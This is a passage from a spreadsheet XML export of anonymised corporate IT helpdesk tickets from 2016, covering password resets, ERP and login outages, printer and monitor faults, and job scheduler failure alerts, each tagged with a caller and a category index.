28.09.2016 15:28:41 an tsbnfixp.numwqahj@gmail.com gesendet._x000a_"/>
    <s v="tsbnfixp numwqahj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="correct billing errors vfx3"/>
    <s v="to correct attached listed errors"/>
    <s v="gacfhedw iqustfzh"/>
    <x v="9"/>
  </r>
  <r>
    <s v="i did a po and it received with no problem, i try to ship thru pweaver in erp and it tells me the server is unable to pr"/>
    <s v="i did a po and it received with no problem, i try to ship thru pweaver in erp and it tells me the server is unable to process the request."/>
    <s v="vwaufgxr nvdyhlqk"/>
    <x v="17"/>
  </r>
  <r>
    <s v="skype issues - calling desk and headset // ooo"/>
    <s v="my skype errors out when calling my desk phone.  it calls other numbers in the building fine when i am in kqelgbis stiarhlu.  also, skype headset is connected and on but doesn't work.  have to switch to pc speakers to hear.  "/>
    <s v="ifblxjmc dyrgfwbm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="iphone : crm app install on iphone."/>
    <s v="iphone : crm app install on iphone."/>
    <s v="jcfignaz tyguzslr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for ytzpxhql ntfxgpms using password_management_tool password reset."/>
    <s v="password resets to everything but erp productio"/>
    <s v="ytzpxhql ntfxgpms"/>
    <x v="16"/>
  </r>
  <r>
    <s v="my 2nd monitor will not display any video, it says no signal can be found."/>
    <s v="my 2nd monitor will not display any video, it says no signal can be found."/>
    <s v="wlsazrce uwehsqbk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="reset passwords for ytzpxhql ntfxgpms using password_management_tool password reset."/>
    <s v="erp password reset needed"/>
    <s v="ytzpxhql ntfxgpms"/>
    <x v="16"/>
  </r>
  <r>
    <s v="wi- fi access to user jamhdtyes kinhytudel"/>
    <s v="wi- fi access to user jamhdtyes kinhytudel"/>
    <s v="kauozcir jlyqxise"/>
    <x v="0"/>
  </r>
  <r>
    <s v="there is no connection to the erp system.  we have no erp, reporting_tool, engineering tool or anything that connects to erp"/>
    <s v="there is no connection to the erp system.  we have no erp, reporting_tool, engineering tool or anything that connects to erp"/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no one at the usa facility can log onto erp.  we receive an error message &quot;loggin balancing error&quot;."/>
    <s v="my contact information is as follows: _x000a_"/>
    <s v="yswgzvrc frjzcnsu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp connection"/>
    <s v="_x000a__x000a_received from: jxgobwrm.qkugdipo@gmail.com_x000a__x000a_i was unable to save my file in ug. keep getting error and save canceled._x000a_rebooted and now i can't login to engineering tool_x000a__x000a_[cid:image001.png@01SID_35986.bcd4a410]_x000a__x000a_knethyen grechduy_x000a_engineer, product engineering_x000a_company_x000a_jxgobwrm.qkugdipo@gmail.com&lt;mailto:jxgobwrm.qkugdipo@gmail.com&gt;_x000a__x000a_[cid:image001.jpg@01ced94a.22bd1f30]_x000a__x000a_"/>
    <s v="jxgobwrm qkugdipo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help. all of our systems are down. erp is down. nx is down. reporting_tool cannot connect. seems to be all users at our site"/>
    <s v="help. all of our systems are down. erp is down. nx is down. reporting_tool cannot connect. seems to be all users at our site"/>
    <s v="tqrlikex moxaebfq"/>
    <x v="3"/>
  </r>
  <r>
    <s v="the termination action for manuel zuehlke has completed."/>
    <s v="hello , _x000d__x000a__x000d__x000a_a kÃ¼ndigung for manuel zuehlke, 21111283, effective 02.09.2016 has been approved. _x000d__x000a_"/>
    <s v="clyauqjw cxwrsflt"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 09/28/2016 13:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 09/28/2016 13:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="administration tools"/>
    <s v="help to install the administration tools in windows 7 os"/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to attach an attachment in expense report"/>
    <s v="unable to attach an attachment in expense report"/>
    <s v="yxsermtd vloueirh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login business_client"/>
    <s v="unable to login business_client as there was no prompt to login to SID_34 account "/>
    <s v="icqleypr kneoblzd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="create quote is not working in distributor_tool"/>
    <s v="create quote is not working in distributor_tool"/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="unlock personal number in ess"/>
    <s v="unlock personal number in ess"/>
    <s v="yxsermtd vloueirh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="warehouse to's are creating with planned pgi date base on confirmed date not customer committed."/>
    <s v="we are finding warehouse to's creating with the planned pgi date based on the production confirmed date and not the committed date to the customer.  this is occurring on orders with multiple schedule lines, usually created by production recommits.  a good example is sales order 35994153 line 5 with to number 263520.  i will be attaching a pdf copy"/>
    <s v="hzpmalgo xpvugeyr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="msoffice 2016 installation"/>
    <s v="msoffice 2016 installation"/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="your prjuysva.vpbudksy@gmail.com unauthorized loggin attempt"/>
    <s v="from: naveuythen dyhtruutt _x000a_sent: wednesday, september 28, 2016 4:56 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: dan fw: your prjuysva.vpbudksy@gmail.com unauthorized loggin attempt_x000a__x000a_hi_x000a__x000a_i am getting this mail continuously from past 15 days .... can you pls have a look into this. _x000a__x000a__x000a_"/>
    <s v="prjuysva vpbudksy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security clearance to view cutter and insert drawings on our web based netweaver system."/>
    <s v="security clearance to view cutter and insert drawings on our web based netweaver system._x000d__x000a__x000d__x000a_hello it team,_x000d__x000a__x000d__x000a_please help my team members get the proper security clearance to view cutter and insert drawings on our web based netweaver system.  "/>
    <s v="ndaoxbvi szxlciue"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i do not get open  gkad from nx9. apper"/>
    <s v="appears the next message: &quot;nx 9 has stoped working&quot; a problem caused the programdnty..._x000d__x000a_gkad lathe &amp; gkad4x function properly"/>
    <s v="otjhnpvk vptsreal"/>
    <x v="45"/>
  </r>
  <r>
    <s v="all the users from usa plant are unable to access mii"/>
    <s v="all the users from usa plant are unable to access mii. they're getting an error which states that recovering webpage. the entire plant is affected."/>
    <s v="kxsceyzo naokumlb"/>
    <x v="40"/>
  </r>
  <r>
    <s v="unable to clock orders in mii. "/>
    <s v="unable to clock orders in mii. multiple user's affected._x000a__x000a_phone: "/>
    <s v="hcdwkxzo quykrcom"/>
    <x v="40"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="kauozcir jlyqxise"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_37hotf failed in job_scheduler at: 09/28/2016 10:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hotf failed in job_scheduler at: 09/28/2016 10:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="can you help resetting the hr_tool time clock password?"/>
    <s v="the clock that you punch in your employee number, it has a maintenance mode and we forgot the password. this is done on the device and not on the pc."/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="missing travel privileges "/>
    <s v="_x000a__x000a_received from: uyrpdvoq.mbzevtcx@gmail.com_x000a__x000a_hi_x000a__x000a_i have now two open travel expenses which i canÂ´t enter into erp_x000a__x000a_can you you please solve it aerp_x000a__x000a_[cid:image001.png@01SID_359a8.4942a430]_x000a__x000a_uyrpdvoq mbzevtcx_x000a_sales manager earthworks european served area â€“ north_x000a__x000a_uyrpdvoq.mbzevtcx@gmail.com&lt;mailto:uyrpdvoq.mbzevtcx@gmail.com&gt;_x000a__x000a_company infrastructure gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx und naruedlk mpvhakdq_x000a__x000a_www.company.com&lt;_x000a__x000a__x000a_"/>
    <s v="uyrpdvoq mbzevtcx"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unlock user &quot;erp-mae&quot; on server HostName_1076"/>
    <s v="please help unlock the user &quot; erp-mae&quot; on server HostName_1076 at the  earliest."/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lost main monitor display"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wlsazrce.uwehsqbk@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_my main monitor will not turn on.  the computer has been shut down and restarted and all cable connections have been checked.  can someone take a look at it?  i can continue working off of the secondary monitor, it is just an inconvenience._x000d__x000a__x000d__x000a_"/>
    <s v="wlsazrce uwehsqbk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="engineering tool client - unable to launch"/>
    <s v="stopped responding error_x000d__x000a_multiple programdnty shortcuts exist on his desktop for engineering_tool, and none of them work._x000d__x000a_password has expired as well as the aiqjxhuv dceghpwn runtime software is missing from the pc_x000d__x000a_"/>
    <s v="fydosbih lafdsumb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in to outlook 2010 after password change"/>
    <s v="unable to sign in to outlook 2010 after password change"/>
    <s v="kijgcwlh gfejlcvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticketing_tool ticket"/>
    <s v="_x000a__x000a_received from: wkqjcfgy.vsknlfri@gmail.com_x000a__x000a_i need to get crm loaded on my outlook._x000a_i'm currently using the web crm version._x000a__x000a_wkqjcfgy vsknlfri_x000a_metalworking sales engineer_x000a_company inc._x000a__x000a_wkqjcfgy.vsknlfri@gmail.com_x000a_technical support:_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="wkqjcfgy vsknlfri"/>
    <x v="0"/>
  </r>
  <r>
    <s v="websites not loading on company center"/>
    <s v="companycenter.company.com"/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="acct 81910520 was set up to get one monthly inwarehouse_tool but they are getting multiple inwarehouse_tools. "/>
    <s v="_x000a_SID_34 - account 81910520 - smhdyhti tool was set up as zm combined monthly billing.  for july &amp; august they received multiple inwarehouse_tools.  see attached. "/>
    <s v="jrzpcesm oznigwvj"/>
    <x v="12"/>
  </r>
  <r>
    <s v="open order book problem (( back order )) - access"/>
    <s v="we are having a problem back order report paramdntyeter in access. _x000d__x000a_((open order book))"/>
    <s v="jevckify sbnohwiv"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="name:mfeyouli ndobtzpw_x000d__x000a_language:_x000d__x000a_browser:microsoft internet explorer_x000d__x000a_email:mfeyouli.ndobtzpw@gmail.com_x000d__x000a_customer number:_x000d__x000a_telephone:5245861556_x000d__x000a_summary:can you unlock haunm erp SID_34 account, he seems to get locked out everytime he tries to log in"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password locked"/>
    <s v="erp SID_34 password locked"/>
    <s v="advqtkeu uypkfisq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on ticket_no0443915"/>
    <s v="update on ticket_no0443915"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer asking to update driver"/>
    <s v="printer asking to update driver"/>
    <s v="gqhfieys pkwcdbrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_9 password reset"/>
    <s v="erp SID_9 password reset"/>
    <s v="ybplwrez lqcyehbf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0443915"/>
    <s v="ticket update on ticket_no0443915"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="etime visibility on hr_tool"/>
    <s v="hi all.  had this issue a month ago and was told to delete my browsing history.  i did and access was restored.  i routinely clear my browsing history but today cannot view etime.  see attached screen shot."/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send skype meeting invitation."/>
    <s v="unable to send skype meeting invitation."/>
    <s v="sdbcpvtx hzpctsla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ughzilfm cfibdamq called requesting for the appreciate hub link"/>
    <s v="ughzilfm cfibdamq called requesting for the appreciate hub link"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="vyjmlain hvjbmdgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit ie \niptbwdq csenjruz"/>
    <s v="probleme mit ie \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v=" wanted to know if the account of pathuick  stope is still active."/>
    <s v=" wanted to know if the account of pathuick  stope is still active."/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can no longer print to tc 47. "/>
    <s v="i am no longer able to print to tc47. i must install a driver for this and i am not sure how. i used to be able to print to tc47 without an issue, and for some reason i am no longer able to."/>
    <s v="zhwktnia dfhormwk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="analysis add in does not show up."/>
    <s v="analysis add in does not show up."/>
    <s v="dslamtcb ezbmonjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="s1 to k1 for hcuixqgj mavxgqbs"/>
    <s v="s1 to k1 for hcuixqgj mavxgqbs"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="33"/>
  </r>
  <r>
    <s v="install we03 \ewew8323601 \acqpinyd ecygimqd"/>
    <s v="install we03 \ewew8323601 \acqpinyd ecygimqd"/>
    <s v="acqpinyd ecygimqd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit portal \acqpinyd ecygimqd"/>
    <s v="probleme mit portal \acqpinyd ecygimqd"/>
    <s v="acqpinyd ecygimqd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="hcuixqgj.mavxgqbs@gmail.com password reset"/>
    <s v="hcuixqgj.mavxgqbs@gmail.com password reset"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit portal .\hcuixqgj mavxgqbs"/>
    <s v="probleme mit portal .\hcuixqgj mavxgqbs"/>
    <s v="hcuixqgj mavxgqbs"/>
    <x v="24"/>
  </r>
  <r>
    <s v="hr_tool etime not loading"/>
    <s v="hr_tool etime not loading"/>
    <s v="psikzmba stumdcqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please delete the attached series of meetings"/>
    <s v="meeting was scheduled by a former employee_x000d__x000a__x000d__x000a_organizer: panjkytr mehrota_x000d__x000a__x000d__x000a_subject: fw: nextgen kentip mfg._x000d__x000a__x000d__x000a_details:_x000d__x000a__x000d__x000a_from: panjkytr mehrotra _x000d__x000a_sent: wednesday, march 09, 2016 11:30 am_x000d__x000a_to: panjkytr mehrotra; ohljvzpn phwdxqev; fabijhsd ocsnugeh; ksvlowjd ptyzxscl; nwgcbfdt ahmbnsoi; aditya choragudi; gotbumak ymdqokfp; cyxieuwk rekwlqmu; ruy frota; estaxpnz mqhrvjkd; vipqmdse zkaowfrx; jhwgydeb ufiatosg; ynlqrebs hwfoqjdu; doug harman; ejvkzobl yijgokrn; frmyejbx weclfnhx; cltszugw tgzbklec; gdxujefz egnwtvch; raouf benamor; lpnzjimdghtyy mwtvondq; lwguyibh nqepkugo; knqmscrw sdtoezjb; arjpdohf mrqwdtil_x000d__x000a_subject: nextgen kentip mfg._x000d__x000a_when: occurs every wednesday effective 3/16/2016 until 12/14/2016 from 9:00 am to 10:00 am (utc-05:00) eastern time (us &amp; canada)._x000d__x000a_where: _mccoy_18_x000d__x000a_"/>
    <s v="jhwgydeb ufiatosg"/>
    <x v="26"/>
  </r>
  <r>
    <s v="job Job_1129conf_s failed in job_scheduler at: 09/28/2016 08:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1129conf_s failed in job_scheduler at: 09/28/2016 08:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="whenever pc is turned on it shows a bluescreen. but then works."/>
    <s v="whenever pc is turned on it shows a blue screen. but then works._x000d__x000a_keith suspects the cache is causing it."/>
    <s v="fmorwhip jidvlbtp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to find network drives after password reset "/>
    <s v="unable to find network drives after password reset "/>
    <s v="dxtulsik xizungmt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 // issue with monitor display"/>
    <s v="name : stdezpqw bkmeuhfz_x000d__x000a_email : stdezpqw.bkmeuhfz@gmail.com_x000d__x000a_telephone : 724-539-5191_x000d__x000a_summary : my 2nd monitor is no longer operating as the 2nd display.  my office was re-arranged yesterday &amp; when i moved the monitor to the right location it stopped displaying the content &amp; only shows a dell window with &quot;self uacyltoe hxgaycze feature check&quot; &amp; red, gtehdnyu, blue &amp; white bars beneath that message.  couldn't activate through control panel"/>
    <s v="stdezpqw bkmeuhfz"/>
    <x v="2"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="qmgspxkf mckfysdh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="configair server in SID_1 uacyltoe hxgaycze environment not working properly - please restart the server"/>
    <s v="mill_model model in SID_1 is not working correctly while starting the configuration proces from scratch. it does not run through the procedures we created to default characteristic values based on selected product platform._x000d__x000a_please restart the server as i have an important training session to amerirtcas cas team at 3pm cest (my time today) - which is 40 min from now."/>
    <s v="iavozegx jpcudyfi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="password issue."/>
    <s v="hi,_x000d__x000a__x000d__x000a_mr. indra kurtyar a is not able to log in due to password issue. _x000d__x000a__x000d__x000a_kindly provide new password to the person._x000d__x000a__x000d__x000a_name: mr. indra kurtyar a_x000d__x000a_i. no 202961_x000d__x000a_user id : vvrajai_x000d__x000a_email : indrakurtyar .rajanna@company.com_x000d__x000a__x000d__x000a_best "/>
    <s v="lpdrjngh brdquyct"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lese und schreibberechtigung fÃ¼r HostName_753\produktion"/>
    <s v="lese und schreibberechtigung fÃ¼r HostName_753\produktion"/>
    <s v="veyduami hjxpwqbi"/>
    <x v="33"/>
  </r>
  <r>
    <s v="modify quote performance model"/>
    <s v="the model and field [pk_publish_pk_otc_quotes_zcae_quote_performance_s].[value_raw_doc_curr_qt] sees to be rounding.  see attached screenshot - converted to usd for that sample quote is 211.30, but the value in lc is 211.00.... but the currency for the document is in usd so these two fields should match."/>
    <s v="urhpnlaf agmsfqil"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to connect to company secure"/>
    <s v="unable to connect to company secure"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please upgrade tom and karghyuens office to the newest"/>
    <s v="please upgrade tom and karghyuen's office to the newest"/>
    <s v="zarlgjes nxjvzcta"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="please reset my password, not sure why mine giving problems?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="gvderpbx udrzjxkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop is getting a power supply not sufficient warning on boot up when docked."/>
    <s v="laptop is getting a power supply not sufficient warning on boot up when docked."/>
    <s v="jmrukcfq rdyuxomp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="zlz agreements  4111244546 +  4111337261 donÂ´t create a planning demand "/>
    <s v="_x000d__x000a__x000d__x000a_received from: qbewrpfu.lwibmxzo@gmail.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_the zlz agreement 4111244546 is shown in md04 as demand, but the is no po for the production plant._x000d__x000a__x000d__x000a_the zlz agreement 4111337261 is not shown as demand in md04._x000d__x000a__x000d__x000a_maybe it is a problem with the material type?_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="qbewrpfu lwibmxzo"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ughzilfm cfibdamq called in to reset password for zlnfpuam aktplhre"/>
    <s v="ughzilfm cfibdamq called in to reset password for zlnfpuam aktplhre"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker vh77 und vh79 funktionieren nicht. ticket bitte an edv germany hr. wurdack/ steinich"/>
    <s v="_x000d__x000a_   â€¢  printer name / make - model?  (ex hq50 â€“ wy98 - hp 8150) _x000d__x000a_ hp laser jet_x000d__x000a_   â€¢  detailed description of the problem ?_x000d__x000a_druckauftrag wir nicht ausgefÃ¼hrt_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_    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tcepzdhi ymbirlod"/>
    <x v="32"/>
  </r>
  <r>
    <s v="outlook not working "/>
    <s v="outlook not working "/>
    <s v="nvszqucy rhtwlzkj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working "/>
    <s v="outlook not working "/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user- moblews forgotten his telephony_software password"/>
    <s v="user- moblews forgotten his telephony_software password_x000d__x000a_schtrtgoyht mobley_x000d__x000a_"/>
    <s v="ijmabvlz vosuedkm"/>
    <x v="6"/>
  </r>
  <r>
    <s v="pc eemw8144241 einrichten damit der barcode angezeigt und man ihm drucken kann"/>
    <s v="pc eemw8144241 einrichten damit der barcode angezeigt und man ihm drucken kann_x000d__x000a_ebs bÃ¼ro a. dicker"/>
    <s v="djilqgmw bidchqsg"/>
    <x v="41"/>
  </r>
  <r>
    <s v="hsh"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aksthyuhath.shettythruy@company.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please reset the password of mr. aqihfoly xsrkthvf._x000d__x000a__x000d__x000a_emp no_x000d__x000a__x000d__x000a_name_x000d__x000a__x000d__x000a_useid_x000d__x000a__x000d__x000a_manager_x000d__x000a__x000d__x000a_200709_x000d__x000a__x000d__x000a_aqihfoly xsrkthvf_x000d__x000a__x000d__x000a_hsh_x000d__x000a__x000d__x000a_panghyiraj shthuihog_x000d__x000a__x000d__x000a__x000d__x000a_fyi._x000d__x000a_[cid:image001.png@01SID_359a4.8f856260]_x000d__x000a__x000d__x000a__x000d__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ordnerfreigabe fÃ¼r m: kvp3 und ce_leiter"/>
    <s v="ordnerfreigabe fÃ¼r m: kvp3 und ce_leiter"/>
    <s v="nemzycxb xpsgkahw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/28/2016 06:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/28/2016 06:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="wifi is not working."/>
    <s v="wifi is not working."/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please give me administration permission for my user id:reddakv"/>
    <s v="please give me administration permission for my user id:reddakv_x000d__x000a_we need to install our team basic applications and software`s."/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="org 1314 - inwarehouse_tool 0159108935 issue"/>
    <s v="the inwarehouse_tool printed output is not complete ie. item no, quantity, unit price and total amount are dierppear.  _x000d__x000a_attached delviery note and inwarehouse_tool are for your information._x000d__x000a_please help fix this issue and advise back to us aerp., "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="12"/>
  </r>
  <r>
    <s v="org 1314 : inwarehouse_tool# 0159108934  issue"/>
    <s v="refer to this inwarehouse_tool no. 0159108934 , the printed inwarehouse_tool is not complete ie. the line item no 60 , quanttiy, unit price and tootal amount are dierppear. also, the total inwarehouse_tool amount is not correct.   the attached are related delivery note and inwarehouse_tool as for your information.  please help fix this issue and inform us aerp., "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="12"/>
  </r>
  <r>
    <s v="please restart the SID_56 server today 8pm est"/>
    <s v="hello team,_x000d__x000a__x000d__x000a_java changes are moved to production but unfortunately db changes were not moved, so we request you please restart the SID_56 server to reflected dba changes in production."/>
    <s v="nvxkdqfi slkojtcg"/>
    <x v="21"/>
  </r>
  <r>
    <s v="incorrect logo is been displayed on distributor_tool"/>
    <s v="incorrect logo is been displayed on distributor_tool._x000d__x000a_logo changes was requested with the ticket ticket_no1475338. logo changes were done and moved to qa.since there was one  file which was dependent with other ticket and logo changes file were moved along with other ticket where requestor does not want the logo changes now."/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="viewer for step files"/>
    <s v="_x000d__x000a__x000d__x000a_received from: azyfsrqh.wkavqigu@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i need an viewer at my computer to check step files._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ssen,_x000d__x000a_with best "/>
    <s v="azyfsrqh wkavqigu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setup new ws \zlnfpuam aktplhre"/>
    <s v="setup new ws \zlnfpuam aktplhre"/>
    <s v="zlnfpuam aktplhre"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp purchasing  access issue  user kgueyiwp cjlonvme (helmu)"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):  purchasing portal (mycompany.company.com/irj/portal)_x000d__x000a__x000d__x000a_enter user id of user having the issue: helmu  _x000d__x000a__x000d__x000a__x000d__x000a_describe the issue: action could not be performed!  the attribudes of the user are inconsistent or not defined. see transaction ppoma_ppb._x000d__x000a_(attached screen shot)_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ekvtdcyq grncjlho"/>
    <x v="29"/>
  </r>
  <r>
    <s v="power outage : vogelfontein sa site hard down since 04:53 am et on 09/28."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______04:53 am et on 09/28.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drucker em06 im auslieferbereich. immer den gleichen lieferschein 10 mal. danach wird erst der richtige ausgedruckt. "/>
    <s v="drucker em06 im auslieferbereich. immer den gleichen lieferschein 10 mal. danach wird erst der richtige ausgedruckt. erp problem"/>
    <s v="egklxsoy hivwzjcf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fqhlvcxn zdfymgjp wants to share the file fqhlvcxn zdfymgjp.pdf with you"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fqhlvcxn.zdfymgjp@gmail.com_x000d__x000a__x000d__x000a_to view fqhlvcxn zdfymgjp.pdf, sign in&lt;_x000d__x000a__x000d__x000a__x000d__x000a_???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????_x000d__x000a_[#+company/posts&gt;  [_x000d__x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="fqhlvcxn zdfymgjp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls check erp SID_34 account of vvgraec - she is not able to sign on anymore"/>
    <s v="pls check erp account of vvgraec - she is not able to sign on anymore, pls see attachment._x000d__x000a_"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="19"/>
  </r>
  <r>
    <s v="???????????????????"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yzbjhmpw.vzrulkog@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35974.fdbf2930]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichem gruÃŸ_x000d__x000a__x000d__x000a_ulrike aÃŸmann_x000d__x000a_custom solutions engineering europe  drilling&amp;countersinking_x000d__x000a_yzbjhmpw.vzrulkog@gmail.com&lt;mailto:yzbjhmpw.vzrulkog@gmail.com&gt;_x000d__x000a_t:+49-911-0846609_x000d__x000a_f:+49-911-0846631_x000d__x000a__x000d__x000a_company shared services gmbh, wehlauer strasse 73, d-90766 fÃ¼rth, www.company.com&lt;_x000d__x000a__x000d__x000a_company shared services gmbh_x000d__x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000d__x000a_sitz der gesellschaft: fÃ¼rth/bay. - registergerirtcht: fÃ¼rth/bay. hrb 10171_x000d__x000a__x000d__x000a__x000d__x000a__x000d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_x000a_[#+company/posts&gt;  [_x000d__x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="yzbjhmpw vzrulkog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="url portal not functioning"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cxltnjuk.hkdefraw@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_mycompany.company.com    site not functioning for applying leave. kindly support._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="cxltnjuk hkdefraw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_66 : volume: f:\ label:dat1-HostName_66 9a625d75 is over  85% space consumed. space available: 1.27 m"/>
